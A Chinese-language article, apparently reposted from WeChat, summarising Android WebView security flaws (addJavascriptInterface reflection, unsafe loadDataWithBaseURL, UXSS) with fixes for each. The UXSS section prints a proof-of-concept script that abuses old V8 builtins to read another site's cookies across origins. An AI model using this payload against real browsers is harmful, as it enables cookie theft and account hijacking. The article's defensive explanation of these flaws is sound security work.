Android WebView 安全问题汇总
原文链接:http://mp.weixin.qq.com/s?__biz=MzAwODE1NTI2MQ==&mid=2247483666&idx=1&sn=81d4756018313ad19124152958b1d18d&chksm=9b727800ac05f116d3f45202ca0af2c2ee7024f49f0d34b1b217885a2792a1d4a03614f4bbbe#rd
一、addJavscriptInterface接口注入JS对象漏洞
问题描述
在使用WebView开发时注入JS对象,当App具有读写SDCARD权限,那么注入的JS对象就可以通过反射机制获取到Java对象Runtime,并调用静态方法来执行一些命令,如读写文件命令等。
解决方案
-
Google在4.2以上系统已经修复。 即使用@JavascriptInterface注解来声明JS访问的方法。
-
对于4.2以下系统可以参考这个开源项目safe-java-js-webview-bridge
-
删除Android系统内部注入的JS对象
webView.removeJavascriptInterface("searchBoxJavaBridge_");//android 4.2以下google默认添加的
webView.removeJavascriptInterface("accessibility");webView.removeJavascriptInterface("accessibilityTraversal");
二、WebView API不安全使用(阿里聚安全)
Webview中可以用loadDataWithBaseURL加载一段html代码,函数原型如下: loadDataWithBaseUrl(String baseUrl, String data, String mimeType, String encoding, String historyUrl)。其中,baseUrl为默认的html代码,data为要加载的 html代码,mimeType为文本类型,encoding为编码格式,historyUrl为历史记录的html代码。如果baseUrl和data可控,则可让app加载指定的攻击html进行攻击。
攻击演示:某app对loadDataWithBaseURL函数使用不当,恶意app可用该漏洞获取Databases目录下webview.db文件。
解决方案:
1. baseUrl和data不要让用户可控。
2. 禁止File域下执行js。
三、uxss(通用xss跨站脚本)漏洞
Uxss(Universal Cross-Site Scripting通用型XSS)UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。可以到达浏览器全局远程执行命令、绕过同源策略、窃取用户资料以及劫持用户的严重危害。
<script>
frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "http://m.baidu.com/";
frame.onload = function() {
Function("}, (builtins = this), function() {");
originalInstantiate = builtins.Instantiate;
builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});
flag = 0;
template = null;
builtins.Instantiate = function(x, y) {
if(flag) {
doc = frame.contentWindow.document;
alert(doc.cookie);
flag = 0;
} else if(!template)
template = x;
return originalInstantiate(x, y);
};
document.implementation;
flag = 1;
builtins.ConfigureTemplateInstance(frame.contentWindow, template);
}
</script>
测试结果(成功跨域读取目标m.baidu.com)的cookie信息
修复建议
-
服务端禁止iframe嵌套X-FRAME-OPTIONS:DENY。 2. 客户端使用setAllowFileAccess(false)方法禁止webview访问本地域。详见:setAllowFileAccess(boolean)
-
客户端使用onPageStarted (WebView view, String url, Bitmap favicon)方法在跳转前进行跨域判断。
-
客户端对iframe object标签属性进行过滤。